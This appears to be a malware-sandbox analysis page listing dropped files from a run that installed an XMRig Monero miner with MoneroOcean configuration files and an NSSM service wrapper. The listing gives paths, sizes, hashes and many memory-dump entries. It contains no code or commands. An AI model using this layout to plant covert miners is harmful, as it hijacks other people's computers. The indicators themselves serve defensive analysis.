C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
ddeb0c5148f3db0e81a0831592537c4e

SHA1
45513bb27003f6129239912cb657ae5562f615ad

SHA256
30e4574405a7e06a95c61669725d401551f2f9251dd4fffd9b1c39beaf537f75

SHA512
540fc098faeda7e8c5562cdc126d54b323832ee10b0bef6b0515e95e2f1e58d89ced034f4b996ebada09025495bd168c7148e6f7db26f45fffd183abfa9423c6

Download Submit
C:\Users\Admin\moneroocean\config_background.json

Filesize
2KB

MD5
22e4f737da6132f7767c248c8ee4b86a

SHA1
c43cd9ea113d76d84dfa09f9450031d82e343706

SHA256
99e2d97a44c13804e883e91e9d94282e8ce617792013b05cd178d0f382061118

SHA512
81a66e6456c24fe9e2c3d77f8604409b2122308aefe65c167a8394d1c2a8942d528167b5b331ce7d9ee07d8a13a010a0064a6dc2fbf641ccc00da3173675966c

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/388-24-0x000002341B860000-0x000002341B86A000-memory.dmp

Filesize
40KB

Download
memory/388-25-0x000002341B890000-0x000002341B8A2000-memory.dmp

Filesize
72KB

Download
memory/1636-10-0x00000201F1C80000-0x00000201F1CA2000-memory.dmp

Filesize
136KB

Download
memory/2080-50-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2080-49-0x0000000001690000-0x00000000016B0000-memory.dmp

Filesize
128KB

Download
memory/4428-187-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-175-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-176-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-177-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-178-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-179-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-180-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-181-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-182-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-183-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-184-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-185-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-186-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-173-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-188-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-189-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-190-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-191-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-192-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-193-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-194-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-195-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-196-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-197-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-198-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-199-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-200-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-201-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-202-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-174-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-215-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-216-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-218-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-221-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-224-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-225-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-226-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-227-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-228-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-229-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-230-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-231-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-232-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-233-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4428-234-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download